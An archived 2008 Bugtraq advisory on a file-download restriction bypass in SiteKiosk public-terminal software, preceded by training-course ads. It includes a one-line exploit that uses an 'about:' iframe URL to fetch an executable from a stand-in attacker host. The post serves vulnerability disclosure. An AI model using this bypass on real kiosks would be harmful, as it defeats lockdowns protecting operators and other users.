Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Proviso SiteKiosk File Download Vulnerability

from [nebelfrost23] Network Security [Permanent Link]
Subject: Proviso SiteKiosk File Download Vulnerability
Date: 29 Mar 2008 22:08:56 -0000 

[>>] Proviso SiteKiosk File Download Vulnerability [<<]


[x] Vendor Information:

"SiteKiosk is a software for public access internet terminals and lets you turn 
any computer into a secure multilanguage Internet terminal (already 20 
different languages included), allowing the user to access the Internet but 
protecting the underlying operating system and files. Possible uses include 
presentations, exhibitions, libraries, and more. SiteKiosk works with normal 
displays and Touchscreens. A keyboard doesn't even have to be attached -- text 
can be entered via a keypad with a mouse. Plentiful options let you decide the 
amount of security your kiosk needs, from hard-disk protection to prohibiting 
specific Websites. The program can be used with either a direct network 
connection or Dial-Up Networking, providing Internet access "on demand." Other 
features include multiple-window support, automatic shutdown/restart, 
Shell-Replacement, hard-disk protection, thorough event-logging support, 
Log-Out Button, content-advisor, great website filtering (with automatic update)
  , an easy-to-use configuration wizard, and more. SiteKiosk supports different 
payment methods like coin machines, bill acceptors, smart cards and others. 
Also very nice is the webcam support which enables users to send voice, video 
and photo emails. It is also possible to administer terminals by remote. 
SiteKiosk uses Internet Explorer as its basis but presents a much simplified 
interface that even the novice user will understand. Excellent online help is 
included."

[x] Attack Information

SiteKiosk tries to block and avoid file downloads. If you click on a link which 
saves a file automatically on your hard drive (e.g. an exe download link) or if 
you right click something and select "save as..." a window will pop up which 
says that it isn't possible to download the file. But you can bypass the issue 
with a special url - you've got to use the "about:"-url. SiteKiosk uses the 
microsoft internet explorer engine to display web sites, so you can also use 
"about:" to display anything directloy from the url. For example "about:hello" 
will display the text "hello" directly in the browser. Of course you can use 
HTML too: "about:<b>hello</b>" will display the text "hello" bold. Normally 
this is harmless, but in SiteKiosk you can use it to download files.

[x] Exploit

Just access this url:

about:<iframe src="http://www.attacker.com/file.exe";></iframe>

[x] Patch

None

[x] Credits

The vulnerability has been discovered by katharsis -

www.katharsis.x2.to
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Proviso SiteKiosk File Download Vulnerability, nebelfrost23 <=
Previous by Date:  Re: Re: XChat 2.8.4-1 - Multiple Vulnerabilities, omnipresent
Next by Date:  Efestech Video v5,0 (id) Remote Sql Injection, dj_remix_20
Previous by Thread:  [Full-disclosure] London DEFCON meet - DC4420 - New Venue - Wednesday 2nd April, 2008, Major Malfunction
Next by Thread:  Efestech Video v5,0 (id) Remote Sql Injection, dj_remix_20
Indexes:  [Date] [Thread] [Top] [All Lists]